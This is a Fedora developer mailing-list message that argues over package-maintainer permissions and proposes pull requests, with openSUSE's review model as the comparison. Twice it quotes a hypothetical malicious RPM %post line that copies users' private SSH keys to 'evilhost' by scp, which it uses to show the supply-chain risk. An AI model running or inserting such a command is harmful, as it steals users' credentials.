On Tue, 2013-05-14 at 14:20 -0600, Kevin Fenzi wrote: > On Tue, 14 May 2013 21:04:59 +0100 > "Richard W.M. Jones" <rjo...@redhat.com> wrote: > > > I suspect the main one is someone putting: > > > > %post > > scp /home/*/.ssh/id_rsa evilhost: > > > > into a commonly used package, or something equivalent but more subtle > > than that. > > > > Basically you're giving root access to everyone with a FAS packager > > account (not that the current situation is that much better). > > well, no, thats not what I was talking about, that is a completely > different issue. ;) > > I was referring to the fact that if we had a collection of around 14,000 > packages and a pool of around 1400 maintainers if everyone just > wandered around working on whatever they liked you would get X people > fixing the same bug and duplicating effort, X people talking to > upstream and telling them different things, X people figuring out a > problem and waiting for something to happen for a real solution and > someone else wandering in and fixing it in a poor/hacky way, X people > telling users one decision and Y people telling them another, etc. > > If you have a small set of interested maintainers they can communicate > between the group and divide work and come to consensus. Things don't > scale to do that over the entire collection on every decision. Well the open model has already been tried and proven in openSUSE, and they're still using it because it actually works really well. There aren't usually any issues regarding overlap of work, though admittedly that community is a smaller than Fedora's. It's hard to get away with scp /home/*/.ssh/id_rsa evilhost because every change is always reviewed by a small group of maintainers responsible for a collection of packages.
I certainly think Fedora could benefit a lot from at least a slightly more collaborative approach. For example, in openSUSE when there is a problem with an really easy fix, I make a bugzilla report, fix it, my request gets accepted (or not) a few days later, and problem solved. In Fedora when there is a problem with an easy fix, I make a bugzilla report, it gets assigned to someone awesome enough to have 200-800 other open bugs to deal with, and nothing happens for two months until a provenpackager stumbles upon the bug. We already use git, so the simple solution with minimal change to the status quo is to leave the maintainership model as-is and add pull requests. (That said I'm not advocating this as I have zero Fedora packaging experience; I'm just trying to get this conversation off the ground.)
signature.asc
Description: This is a digitally signed message part
-- devel mailing list devel@lists.fedoraproject.org https://admin.fedoraproject.org/mailman/listinfo/devel
